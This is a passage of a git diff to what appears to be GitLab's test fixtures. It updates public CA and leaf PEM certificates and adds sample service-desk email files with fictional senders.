+cY9VZzkAvwIDAQABo4IBlTCCAZEwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQG +CCsGAQUFBwMBBggrBgEFBQcDAjASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQW +BBQqNLmq+r88iPFH8tISeL7F5aqwaTAfBgNVHSMEGDAWgBSP8Et/qC5FJK5NUPpj +move4t0bvDB7BggrBgEFBQcBAQRvMG0wLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3Nw +Mi5nbG9iYWxzaWduLmNvbS9yb290cjMwOwYIKwYBBQUHMAKGL2h0dHA6Ly9zZWN1 +cmUuZ2xvYmFsc2lnbi5jb20vY2FjZXJ0L3Jvb3QtcjMuY3J0MDYGA1UdHwQvMC0w +K6ApoCeGJWh0dHA6Ly9jcmwuZ2xvYmFsc2lnbi5jb20vcm9vdC1yMy5jcmwwVwYD +VR0gBFAwTjAIBgZngQwBAgEwQgYKKwYBBAGgMgoBAzA0MDIGCCsGAQUFBwIBFiZo +dHRwczovL3d3dy5nbG9iYWxzaWduLmNvbS9yZXBvc2l0b3J5LzANBgkqhkiG9w0B +AQsFAAOCAQEAEsIwXEhdAfoUGaKAnYfVI7zsOY7Sx8bpC/obGxXa4Kyu8CVx+TtT +g8WmKNF7+I7C51NZEmhvb8UDI1G9ny7iYIRDajQD5AeZowbfC69aHQSI9LiOeAZb +YaRDJfWps9redPwoaC0iT5R4xLOnWwCtmIho1bv/YG3pMAvaQ+qn04kuUvWO7LEp +u7FdHmx1DdgkefcqYgN/rAZ8E39S9VxWV+64PNUDey8vkAIH8FCTxbWiITty6dsH +SulKQ9pSa93k9PHTf+di08mMQBq5WBWTiFeMYZEWyE/z7NHdU3eLMZjq6y/nKlF9 +nywrToh4AgdZK6JnbU+lqbNiexJbaBoA3w== -----END CERTIFICATE----- -----BEGIN CERTIFICATE----- -MIIDxTCCAq2gAwIBAgIQAqxcJmoLQJuPC3nyrkYldzANBgkqhkiG9w0BAQUFADBs -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j -ZSBFViBSb290IENBMB4XDTA2MTExMDAwMDAwMFoXDTMxMTExMDAwMDAwMFowbDEL -MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 -LmRpZ2ljZXJ0LmNvbTErMCkGA1UEAxMiRGlnaUNlcnQgSGlnaCBBc3N1cmFuY2Ug -RVYgUm9vdCBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMbM5XPm -+9S75S0tMqbf5YE/yc0lSbZxKsPVlDRnogocsF9ppkCxxLeyj9CYpKlBWTrT3JTW -PNt0OKRKzE0lgvdKpVMSOO7zSW1xkX5jtqumX8OkhPhPYlG++MXs2ziS4wblCJEM -xChBVfvLWokVfnHoNb9Ncgk9vjo4UFt3MRuNs8ckRZqnrG0AFFoEt7oT61EKmEFB -Ik5lYYeBQVCmeVyJ3hlKV9Uu5l0cUyx+mM0aBhakaHPQNAQTXKFx01p8VdteZOE3 -hzBWBOURtCmAEvF5OYiiAhF8J2a3iLd48soKqDirCmTCv2ZdlYTBoSUeh10aUAsg -EsxBu24LUTi4S8sCAwEAAaNjMGEwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQF -MAMBAf8wHQYDVR0OBBYEFLE+w2kD+L9HAdSYJhoIAu9jZCvDMB8GA1UdIwQYMBaA -FLE+w2kD+L9HAdSYJhoIAu9jZCvDMA0GCSqGSIb3DQEBBQUAA4IBAQAcGgaX3Nec -nzyIZgYIVyHbIUf4KmeqvxgydkAQV8GK83rZEWWONfqe/EW1ntlMMUu4kehDLI6z -eM7b41N5cdblIZQB2lWHmiRk9opmzN6cN82oNLFpmyPInngiK3BD41VHMWEZ71jF -hS9OMPagMRYjyOfiZRYzy78aG6A9+MpeizGLYAiJLQwGXFK3xPkKmNEVX58Svnw2 -Yzi9RKR/5CYrCsSXaQ3pjOLAEFe4yHYSkVXySGnYvCoCWw9E1CAx2/S6cCZdkGCe -vEsXCS+0yx5DaMkHJ8HSXPfqIbloEpw8nL+e/IBcm2PN7EeqJSdnoDfzAIJ9VNep -+OkuE6N36B9K +MIIDXzCCAkegAwIBAgILBAAAAAABIVhTCKIwDQYJKoZIhvcNAQELBQAwTDEgMB4G +A1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjMxEzARBgNVBAoTCkdsb2JhbFNp +Z24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMDkwMzE4MTAwMDAwWhcNMjkwMzE4 +MTAwMDAwWjBMMSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMzETMBEG +A1UEChMKR2xvYmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBAMwldpB5BngiFvXAg7aEyiie/QV2EcWtiHL8 +RgJDx7KKnQRfJMsuS+FggkbhUqsMgUdwbN1k0ev1LKMPgj0MK66X17YUhhB5uzsT +gHeMCOFJ0mpiLx9e+pZo34knlTifBtc+ycsmWQ1z3rDI6SYOgxXG71uL0gRgykmm +KPZpO/bLyCiR5Z2KYVc3rHQU3HTgOu5yLy6c+9C7v/U9AOEGM+iCK65TpjoWc4zd +QQ4gOsC0p6Hpsk+QLjJg6VfLuQSSaGjlOCZgdbKfd/+RFO+uIEn8rUAVSNECMWEZ +XriX7613t2Saer9fwRPvm2L7DWzgVGkWqQPabumDk3F2xmmFghcCAwEAAaNCMEAw +DgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFI/wS3+o +LkUkrk1Q+mOai97i3Ru8MA0GCSqGSIb3DQEBCwUAA4IBAQBLQNvAUKr+yAzv95ZU +RUm7lgAJQayzE4aGKAczymvmdLm6AC2upArT9fHxD4q/c2dKg8dEe3jgr25sbwMp +jjM5RcOO5LlXbKr8EpbsU8Yt5CRsuZRj+9xTaGdWPoO4zzUhw8lo/s7awlOqzJCK +6fBdRoyV3XpYKBovHd7NADdBj+1EbddTKJd+82cEHhXXipa0095MJ6RMG3NzdvQX +mcIfeg7jLQitChws/zyrVQ4PkX4268NXSb7hLi18YIvDQVETI53O9zJrlAGomecs +Mx86OyXShkDOOyyGeMlhLxS67ttVb9+E7gUJTb0o2HLO02JQZR7rkpeDMdmztcpH +WD9f -----END CERTIFICATE----- diff --git a/spec/fixtures/clusters/intermediate_certificate.pem b/spec/fixtures/clusters/intermediate_certificate.pem index 8a81175b746..21bada73564 100644 --- a/spec/fixtures/clusters/intermediate_certificate.pem +++ b/spec/fixtures/clusters/intermediate_certificate.pem @@ -1,28 +1,28 @@ -----BEGIN CERTIFICATE----- -MIIEtjCCA56gAwIBAgIQDHmpRLCMEZUgkmFf4msdgzANBgkqhkiG9w0BAQsFADBs -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMSswKQYDVQQDEyJEaWdpQ2VydCBIaWdoIEFzc3VyYW5j -ZSBFViBSb290IENBMB4XDTEzMTAyMjEyMDAwMFoXDTI4MTAyMjEyMDAwMFowdTEL -MAkGA1UEBhMCVVMxFTATBgNVBAoTDERpZ2lDZXJ0IEluYzEZMBcGA1UECxMQd3d3 -LmRpZ2ljZXJ0LmNvbTE0MDIGA1UEAxMrRGlnaUNlcnQgU0hBMiBFeHRlbmRlZCBW -YWxpZGF0aW9uIFNlcnZlciBDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC -ggEBANdTpARR+JmmFkhLZyeqk0nQOe0MsLAAh/FnKIaFjI5j2ryxQDji0/XspQUY -uD0+xZkXMuwYjPrxDKZkIYXLBxA0sFKIKx9om9KxjxKws9LniB8f7zh3VFNfgHk/ -LhqqqB5LKw2rt2O5Nbd9FLxZS99RStKh4gzikIKHaq7q12TWmFXo/a8aUGxUvBHy -/Urynbt/DvTVvo4WiRJV2MBxNO723C3sxIclho3YIeSwTQyJ3DkmF93215SF2AQh -cJ1vb/9cuhnhRctWVyh+HA1BV6q3uCe7seT6Ku8hI3UarS2bhjWMnHe1c63YlC3k -8wyd7sFOYn4XwHGeLN7x+RAoGTMCAwEAAaOCAUkwggFFMBIGA1UdEwEB/wQIMAYB -Af8CAQAwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEF -BQcDAjA0BggrBgEFBQcBAQQoMCYwJAYIKwYBBQUHMAGGGGh0dHA6Ly9vY3NwLmRp -Z2ljZXJ0LmNvbTBLBgNVHR8ERDBCMECgPqA8hjpodHRwOi8vY3JsNC5kaWdpY2Vy -dC5jb20vRGlnaUNlcnRIaWdoQXNzdXJhbmNlRVZSb290Q0EuY3JsMD0GA1UdIAQ2 -MDQwMgYEVR0gADAqMCgGCCsGAQUFBwIBFhxodHRwczovL3d3dy5kaWdpY2VydC5j -b20vQ1BTMB0GA1UdDgQWBBQ901Cl1qCt7vNKYApl0yHU+PjWDzAfBgNVHSMEGDAW -gBSxPsNpA/i/RwHUmCYaCALvY2QrwzANBgkqhkiG9w0BAQsFAAOCAQEAnbbQkIbh -hgLtxaDwNBx0wY12zIYKqPBKikLWP8ipTa18CK3mtlC4ohpNiAexKSHc59rGPCHg -4xFJcKx6HQGkyhE6V6t9VypAdP3THYUYUN9XR3WhfVUgLkc3UHKMf4Ib0mKPLQNa -2sPIoc4sUqIAY+tzunHISScjl2SFnjgOrWNoPLpSgVh5oywM395t6zHyuqB8bPEs -1OG9d4Q3A84ytciagRpKkk47RpqF/oOi+Z6Mo8wNXrM9zwR4jxQUezKcxwCmXMS1 -oVWNWlZopCJwqjyBcdmdqEU79OX2olHdx3ti6G8MdOu42vi/hw15UJGQmxg7kVkn -8TUoE6smftX3eg== +MIIExTCCA62gAwIBAgIQeimFGrf0XWZ5UGZBtv/XHTANBgkqhkiG9w0BAQsFADBM +MSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMzETMBEGA1UEChMKR2xv +YmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjAeFw0yMTA2MTYxMjAwMDBaFw0y +NDA2MTYwMDAwMDBaMFgxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWdu +IG52LXNhMS4wLAYDVQQDEyVHbG9iYWxTaWduIEF0bGFzIFIzIERWIFRMUyBDQSBI +MiAyMDIxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1JTAQMj+QUYF +3d9X5eOWFOphbB6GpHE3J0uvUXcQwxnd8Jz26aQCE1ZYxJFEc2WmsxuVeVXU+rZj +7+MYD7Mg72bhuiwUdwRGRN4a2N122LfIQlTFlHu/fwcNqYX/fe3phvZt9upnH4oJ +aLBbay+t+HPPC4em74x2WKaIl31ZXzgzllLomnlLISLOKiQe1rEHp4yy3/yE2a4G +1l/lprA49dcyM/oylm9Bbkum2F4C+EOjHgTAoDVJrJpdWvPj0CU+HkmftujfFp4S +55LECSr2TfJt7xjgR3eLUx12nlpoauWEzZ0/i6OIDPfbmqcksw4ani/YO07LbRM6 +cY9VZzkAvwIDAQABo4IBlTCCAZEwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQG +CCsGAQUFBwMBBggrBgEFBQcDAjASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQW +BBQqNLmq+r88iPFH8tISeL7F5aqwaTAfBgNVHSMEGDAWgBSP8Et/qC5FJK5NUPpj +move4t0bvDB7BggrBgEFBQcBAQRvMG0wLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3Nw +Mi5nbG9iYWxzaWduLmNvbS9yb290cjMwOwYIKwYBBQUHMAKGL2h0dHA6Ly9zZWN1 +cmUuZ2xvYmFsc2lnbi5jb20vY2FjZXJ0L3Jvb3QtcjMuY3J0MDYGA1UdHwQvMC0w +K6ApoCeGJWh0dHA6Ly9jcmwuZ2xvYmFsc2lnbi5jb20vcm9vdC1yMy5jcmwwVwYD +VR0gBFAwTjAIBgZngQwBAgEwQgYKKwYBBAGgMgoBAzA0MDIGCCsGAQUFBwIBFiZo +dHRwczovL3d3dy5nbG9iYWxzaWduLmNvbS9yZXBvc2l0b3J5LzANBgkqhkiG9w0B +AQsFAAOCAQEAEsIwXEhdAfoUGaKAnYfVI7zsOY7Sx8bpC/obGxXa4Kyu8CVx+TtT +g8WmKNF7+I7C51NZEmhvb8UDI1G9ny7iYIRDajQD5AeZowbfC69aHQSI9LiOeAZb +YaRDJfWps9redPwoaC0iT5R4xLOnWwCtmIho1bv/YG3pMAvaQ+qn04kuUvWO7LEp +u7FdHmx1DdgkefcqYgN/rAZ8E39S9VxWV+64PNUDey8vkAIH8FCTxbWiITty6dsH +SulKQ9pSa93k9PHTf+di08mMQBq5WBWTiFeMYZEWyE/z7NHdU3eLMZjq6y/nKlF9 +nywrToh4AgdZK6JnbU+lqbNiexJbaBoA3w== -----END CERTIFICATE----- diff --git a/spec/fixtures/clusters/leaf_certificate.pem b/spec/fixtures/clusters/leaf_certificate.pem new file mode 100644 index 00000000000..aecb3fc8d4b --- /dev/null +++ b/spec/fixtures/clusters/leaf_certificate.pem @@ -0,0 +1,37 @@ +-----BEGIN CERTIFICATE----- +MIIGYzCCBUugAwIBAgIQAaQHyOeT/PBR4ioLKYneZDANBgkqhkiG9w0BAQsFADBY +MQswCQYDVQQGEwJCRTEZMBcGA1UEChMQR2xvYmFsU2lnbiBudi1zYTEuMCwGA1UE +AxMlR2xvYmFsU2lnbiBBdGxhcyBSMyBEViBUTFMgQ0EgSDIgMjAyMTAeFw0yMTEw +MTgxODUwMDRaFw0yMjExMTkxODUwMDNaMBsxGTAXBgNVBAMMEGFib3V0LmdpdGxh +Yi5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDWSo0eziN/0lq5 +dIcS7ZceJw2odzZeT0tRkcKEW8iagNul6JetrFlk6h5lxoLEu35+MK6/fWHNmt7u +eQk7HS0uRipskAzeGrL1Hvk8EjIcHXXTxpRu7JqWOu7ZSXwNxW5cqn7L9/N2gYwt +Jg/sfkv9AFQiNOdKrarKfbcBstxmra6rQbh5ggLG5UBT23N4ZrA3XnzvEx3+GjtO +u/a5izbk7FQP3gyXKyfm/SQRpNsytYa9jJqu5Hmyzfap5KaueOJbtJEOk8dR/HWR +i/gmAUevq62MNxorYbz8YU/P1468tS7iORkD31Tc2QWCMQSPya5qGaCGnz7dVgWy +E1xTPbBXAgMBAAGjggNkMIIDYDAbBgNVHREEFDASghBhYm91dC5naXRsYWIuY29t +MA4GA1UdDwEB/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIw +HQYDVR0OBBYEFJFVruwpjWeUfGJXl3m5grAjhAwPMFcGA1UdIARQME4wCAYGZ4EM +AQIBMEIGCisGAQQBoDIKAQMwNDAyBggrBgEFBQcCARYmaHR0cHM6Ly93d3cuZ2xv +YmFsc2lnbi5jb20vcmVwb3NpdG9yeS8wDAYDVR0TAQH/BAIwADCBngYIKwYBBQUH +AQEEgZEwgY4wQAYIKwYBBQUHMAGGNGh0dHA6Ly9vY3NwLmdsb2JhbHNpZ24uY29t +L2NhL2dzYXRsYXNyM2R2dGxzY2FoMjIwMjEwSgYIKwYBBQUHMAKGPmh0dHA6Ly9z +ZWN1cmUuZ2xvYmFsc2lnbi5jb20vY2FjZXJ0L2dzYXRsYXNyM2R2dGxzY2FoMjIw +MjEuY3J0MB8GA1UdIwQYMBaAFCo0uar6vzyI8Ufy0hJ4vsXlqrBpMEgGA1UdHwRB +MD8wPaA7oDmGN2h0dHA6Ly9jcmwuZ2xvYmFsc2lnbi5jb20vY2EvZ3NhdGxhc3Iz +ZHZ0bHNjYWgyMjAyMS5jcmwwggF+BgorBgEEAdZ5AgQCBIIBbgSCAWoBaAB3AG9T +dqwx8DEZ2JkApFEV/3cVHBHZAsEAKQaNsgiaN9kTAAABfJS9R5YAAAQDAEgwRgIh +AOOZmc41vB2ICwkwEB5Bmpm/X8UHfjbxwrCXEdeRmO+qAiEAg/JugZIrG2PeV4bA +Gm6rry7HUfB954bQJ4p0PeQVmwsAdABGpVXrdfqRIDC1oolp9PN9ESxBdL79SbiF +q/L8cP5tRwAAAXyUvUeOAAAEAwBFMEMCHyRAiTz2fZ8DuQF6hrVP+IMTCPBtjB3D +m4naI8tC/foCIDXFCRIYjRb00CFI6piLYGihRy+GYF5nMQhQ9uE6hltzAHcAUaOw +9f0BeZxWbbg3eI8MpHrMGyfL956IQpoN/tSLBeUAAAF8lL1ICgAABAMASDBGAiEA +5d/bXb9TPZWhwSH8GGji/LDFL6OJnZtOV94sBaDiFgMCIQCtl00oCRMFFnqsvBo6 +SRtnDqJkEHYBS12I4LyC+D1onjANBgkqhkiG9w0BAQsFAAOCAQEAE5xcno79J+Ec +DIPJKnJCugKiM7yKjCjCp/63osCbRC+jUwRyXBIe/oTdY3geKwDOQAvyEeJPSWP1 +LbNp0l3yHbYXfsYl/NMTrJpjrJrrRO5BxG/d3IPwXIlcZrrdDSoGfGYIF9N23iqB +in15L7B+PodTl8/mSQZTjbLoecPvl+AOcLyStcWCKYQUlQb3x4UV3R4Z1ukwGbBC +cDbTR2XOSJzA9ECJcxKnWjQRQUc54pdG3pt13Wu2dVapX5sWZpV05rga3bBDjCqw +DcfKuYbOChm2i6CQ578lAntPTIS02EkGFHrmYxrIAvlhGksHpJNJtRoff1KkQKni +r8emWp7D2Q== +-----END CERTIFICATE----- diff --git a/spec/fixtures/clusters/root_certificate.pem b/spec/fixtures/clusters/root_certificate.pem index 40107bd837d..8afb219058f 100644 --- a/spec/fixtures/clusters/root_certificate.pem +++ b/spec/fixtures/clusters/root_certificate.pem @@ -1,49 +1,21 @@ -----BEGIN CERTIFICATE----- -MIIItjCCB56gAwIBAgIQCu5Ga1hR41iahM0SWhyeNjANBgkqhkiG9w0BAQsFADB1 -MQswCQYDVQQGEwJVUzEVMBMGA1UEChMMRGlnaUNlcnQgSW5jMRkwFwYDVQQLExB3 -d3cuZGlnaWNlcnQuY29tMTQwMgYDVQQDEytEaWdpQ2VydCBTSEEyIEV4dGVuZGVk -IFZhbGlkYXRpb24gU2VydmVyIENBMB4XDTE5MTIwNDAwMDAwMFoXDTIxMTIwODEy -MDAwMFowgb0xHTAbBgNVBA8MFFByaXZhdGUgT3JnYW5pemF0aW9uMRMwEQYLKwYB -BAGCNzwCAQMTAlVTMRUwEwYLKwYBBAGCNzwCAQITBFV0YWgxFTATBgNVBAUTDDUy -OTk1MzctMDE0MjELMAkGA1UEBhMCVVMxDTALBgNVBAgTBFV0YWgxDTALBgNVBAcT -BExlaGkxFzAVBgNVBAoTDkRpZ2lDZXJ0LCBJbmMuMRUwEwYDVQQDEwxkaWdpY2Vy -dC5jb20wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDAeRYb/RLbljGZ -IB//DrEdyKYMQqqaJwBlrr3t2paAWNuDJizvVkTMIzdJesI1pA58Myenxp5Dp8GJ -u/VhBf//v/HAZHUE4xwu104Fg6A1BwUEKgVKERf+7kTt17Lf9fcMIjMyL+FeyPXb -DOFbH+ej/nYaneFLch2j2xWZg1+Thk0qBlGE8WWAK+fvbEuM0SOeH9RkYFCNGPRS -KsLn0GvaCnnD4LfNDyMqYop0IpaqXoREEnkRv1MVSOw+hBj497wnnO+/GZegfzwU -iS60h+PjlDfmdCP18qOS7tRd0qnfU3N3S+PYEd3R63LMcIfbgXNEEWBNKpiH9+8f -eXq6bXKPAgMBAAGjggT3MIIE8zAfBgNVHSMEGDAWgBQ901Cl1qCt7vNKYApl0yHU -+PjWDzAdBgNVHQ4EFgQUTx0XO7HqD5DOhwlm2p+70uYPBmgwggGjBgNVHREEggGa -MIIBloIMZGlnaWNlcnQuY29tggl0aGF3dGUuZGWCC2ZyZWVzc2wuY29tggxyYXBp -ZHNzbC5jb22CDGdlb3RydXN0LmNvbYIJdGhhd3RlLmZyggp0aGF3dGUuY29tghB3 -d3cucmFwaWRzc2wuY29tghB3d3cuZ2VvdHJ1c3QuY29tgg13d3cudGhhd3RlLmZy -gg13d3cudGhhd3RlLmRlgg53d3cudGhhd3RlLmNvbYIQd3d3LmRpZ2ljZXJ0LmNv -bYIYa2ItaW50ZXJuYWwuZGlnaWNlcnQuY29tghprbm93bGVkZ2ViYXNlLmRpZ2lj -ZXJ0LmNvbYIWa25vd2xlZGdlLmRpZ2ljZXJ0LmNvbYIPa2guZGlnaWNlcnQuY29t -ghlrbm93bGVkZ2VodWIuZGlnaWNlcnQuY29tghh3ZWJzZWN1cml0eS5kaWdpY2Vy -dC5jb22CFGNvbnRlbnQuZGlnaWNlcnQuY29tgg93d3cuZnJlZXNzbC5jb22CHHd3 -dy53ZWJzZWN1cml0eS5kaWdpY2VydC5jb20wDgYDVR0PAQH/BAQDAgWgMB0GA1Ud -JQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjB1BgNVHR8EbjBsMDSgMqAwhi5odHRw -Oi8vY3JsMy5kaWdpY2VydC5jb20vc2hhMi1ldi1zZXJ2ZXItZzIuY3JsMDSgMqAw -hi5odHRwOi8vY3JsNC5kaWdpY2VydC5jb20vc2hhMi1ldi1zZXJ2ZXItZzIuY3Js -MEsGA1UdIAREMEIwNwYJYIZIAYb9bAIBMCowKAYIKwYBBQUHAgEWHGh0dHBzOi8v -d3d3LmRpZ2ljZXJ0LmNvbS9DUFMwBwYFZ4EMAQEwgYgGCCsGAQUFBwEBBHwwejAk -BggrBgEFBQcwAYYYaHR0cDovL29jc3AuZGlnaWNlcnQuY29tMFIGCCsGAQUFBzAC -hkZodHRwOi8vY2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRTSEEyRXh0ZW5k -ZWRWYWxpZGF0aW9uU2VydmVyQ0EuY3J0MAwGA1UdEwEB/wQCMAAwggF8BgorBgEE -AdZ5AgQCBIIBbASCAWgBZgB1AKS5CZC0GFgUh7sTosxncAo8NZgE+RvfuON3zQ7I -DdwQAAABbtLkOs4AAAQDAEYwRAIgQ7gh393PInhYfPOhg/lF9yZNRdvjBeufFoG8 -VnBuPNMCIBP8YGC83ig5ttw3ipSRjH0bKj4Ak5O4rynoql9Dy8x3AHYAVhQGmi/X -wuzT9eG9RLI+x0Z2ubyZEVzA75SYVdaJ0N0AAAFu0uQ7VgAABAMARzBFAiEAhzE7 -1c48wn3s/30IB4WgxfpLburH0Ku8cchv8QeqcgACIBrWpUlDD18AOfkPCOcB2kWU -vRXsdptVm3jPeU5TtDSoAHUAu9nfvB+KcbWTlCOXqpJ7RzhXlQqrUugakJZkNo4e -0YUAAAFu0uQ60gAABAMARjBEAiBBpH5m7ntGKFTOFgSLcFXRDg66xJqerMy0gOHj -4TIBYAIgfFABPNy6P61hjiOWwjq73lvoEdAyh18GeFHIp0BgsWEwDQYJKoZIhvcN -AQELBQADggEBAInaSEqteyQA1zUKiXVqgffhHKZsUq9UnMows6X+UoFPoby9xqm6 -IaY/77zaFZYwXJlP/SvrlbgTLHAdir3y38uhAlfPX4iRuwggOpFFF5hqDckzCm91 -ocGnoG6sUY5mOqKu2vIcZkUQDe+K5gOxI6ME/4YwzWCIcTmBPQ6NQmqiFLPoQty1 -gdbGCcLQNFCuNq4n5OK2NmBjcbtyT4gglat7C4+KV8RkEubZ+MkXzyDkpEXjjzsK -7iuNB0hRgyyhGzHrlZ/l0OLoT0Cb4I5PzzRSseFEyPKCC1WSF7aE9rFfUqhpqSAT -7NV7SEijYyFFtuZfz9RGglcqnRlAfgTy+tU= +MIIDXzCCAkegAwIBAgILBAAAAAABIVhTCKIwDQYJKoZIhvcNAQELBQAwTDEgMB4G +A1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjMxEzARBgNVBAoTCkdsb2JhbFNp +Z24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMDkwMzE4MTAwMDAwWhcNMjkwMzE4 +MTAwMDAwWjBMMSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMzETMBEG +A1UEChMKR2xvYmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBAMwldpB5BngiFvXAg7aEyiie/QV2EcWtiHL8 +RgJDx7KKnQRfJMsuS+FggkbhUqsMgUdwbN1k0ev1LKMPgj0MK66X17YUhhB5uzsT +gHeMCOFJ0mpiLx9e+pZo34knlTifBtc+ycsmWQ1z3rDI6SYOgxXG71uL0gRgykmm +KPZpO/bLyCiR5Z2KYVc3rHQU3HTgOu5yLy6c+9C7v/U9AOEGM+iCK65TpjoWc4zd +QQ4gOsC0p6Hpsk+QLjJg6VfLuQSSaGjlOCZgdbKfd/+RFO+uIEn8rUAVSNECMWEZ +XriX7613t2Saer9fwRPvm2L7DWzgVGkWqQPabumDk3F2xmmFghcCAwEAAaNCMEAw +DgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFI/wS3+o +LkUkrk1Q+mOai97i3Ru8MA0GCSqGSIb3DQEBCwUAA4IBAQBLQNvAUKr+yAzv95ZU +RUm7lgAJQayzE4aGKAczymvmdLm6AC2upArT9fHxD4q/c2dKg8dEe3jgr25sbwMp +jjM5RcOO5LlXbKr8EpbsU8Yt5CRsuZRj+9xTaGdWPoO4zzUhw8lo/s7awlOqzJCK +6fBdRoyV3XpYKBovHd7NADdBj+1EbddTKJd+82cEHhXXipa0095MJ6RMG3NzdvQX +mcIfeg7jLQitChws/zyrVQ4PkX4268NXSb7hLi18YIvDQVETI53O9zJrlAGomecs +Mx86OyXShkDOOyyGeMlhLxS67ttVb9+E7gUJTb0o2HLO02JQZR7rkpeDMdmztcpH +WD9f -----END CERTIFICATE----- diff --git a/spec/fixtures/emails/service_desk_custom_address_envelope_to.eml b/spec/fixtures/emails/service_desk_custom_address_envelope_to.eml new file mode 100644 index 00000000000..ae8f3598a13 --- /dev/null +++ b/spec/fixtures/emails/service_desk_custom_address_envelope_to.eml @@ -0,0 +1,24 @@ +Envelope-To: support+project_slug-project_key@example.com +Return-Path: <alan@adventuretime.ooo> +Received: from iceking.adventuretime.ooo ([unix socket]) by iceking (Cyrus v2.2.13-Debian-2.2.13-19+squeeze3) with LMTPA; Thu, 13 Jun 2013 17:03:50 -0400 +Received: from mail-ie0-x234.google.com (mail-ie0-x234.google.com [IPv6:2607:f8b0:4001:c03::234]) by iceking.adventuretime.ooo (8.14.3/8.14.3/Debian-9.4) with ESMTP id r5DL3nFJ016967 (version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NOT) for <incoming+gitlabhq/gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 17:03:50 -0400 +Received: by mail-ie0-f180.google.com with SMTP id f4so21977375iea.25 for <incoming+email-test-project_id-issue-@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 14:03:48 -0700 +Received: by 10.0.0.1 with HTTP; Thu, 13 Jun 2013 14:03:48 -0700 +Date: Thu, 13 Jun 2013 17:03:48 -0400 +From: Jake the Dog <alan@adventuretime.ooo> +To: support@example.com +Message-ID: <CAH_Wr+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +In-Reply-To: <CADkmRc+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +Subject: The message subject! @all +Mime-Version: 1.0 +Content-Type: text/plain; + charset=ISO-8859-1 +Content-Transfer-Encoding: 7bit +X-Sieve: CMU Sieve 2.2 +X-Received: by 10.0.0.1 with SMTP id n7mr11234144ipb.85.1371157428600; Thu, + 13 Jun 2013 14:03:48 -0700 (PDT) +X-Scanned-By: MIMEDefang 2.69 on IPv6:2001:470:1d:165::1 + +Service desk reply! + +/label ~label2 diff --git a/spec/fixtures/emails/service_desk_custom_address_reply.eml b/spec/fixtures/emails/service_desk_custom_address_reply.eml new file mode 100644 index 00000000000..7ca17a32267 --- /dev/null +++ b/spec/fixtures/emails/service_desk_custom_address_reply.eml @@ -0,0 +1,24 @@ +Delivered-To: support+project_slug-project_key@example.com +Return-Path: <alan@adventuretime.ooo> +Received: from iceking.adventuretime.ooo ([unix socket]) by iceking (Cyrus v2.2.13-Debian-2.2.13-19+squeeze3) with LMTPA; Thu, 13 Jun 2013 17:03:50 -0400 +Received: from mail-ie0-x234.google.com (mail-ie0-x234.google.com [IPv6:2607:f8b0:4001:c03::234]) by iceking.adventuretime.ooo (8.14.3/8.14.3/Debian-9.4) with ESMTP id r5DL3nFJ016967 (version=TLSv1/SSLv3 cipher=RC4-SHA bits=128 verify=NOT) for <incoming+gitlabhq/gitlabhq@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 17:03:50 -0400 +Received: by mail-ie0-f180.google.com with SMTP id f4so21977375iea.25 for <incoming+email-test-project_id-issue-@appmail.adventuretime.ooo>; Thu, 13 Jun 2013 14:03:48 -0700 +Received: by 10.0.0.1 with HTTP; Thu, 13 Jun 2013 14:03:48 -0700 +Date: Thu, 13 Jun 2013 17:03:48 -0400 +From: Jake the Dog <alan@adventuretime.ooo> +To: support@example.com +Message-ID: <CAH_Wr+rNGAGGbV2iE5p918UVy4UyJqVcXRO2=otppgzduJSg@mail.gmail.com> +In-Reply-To: 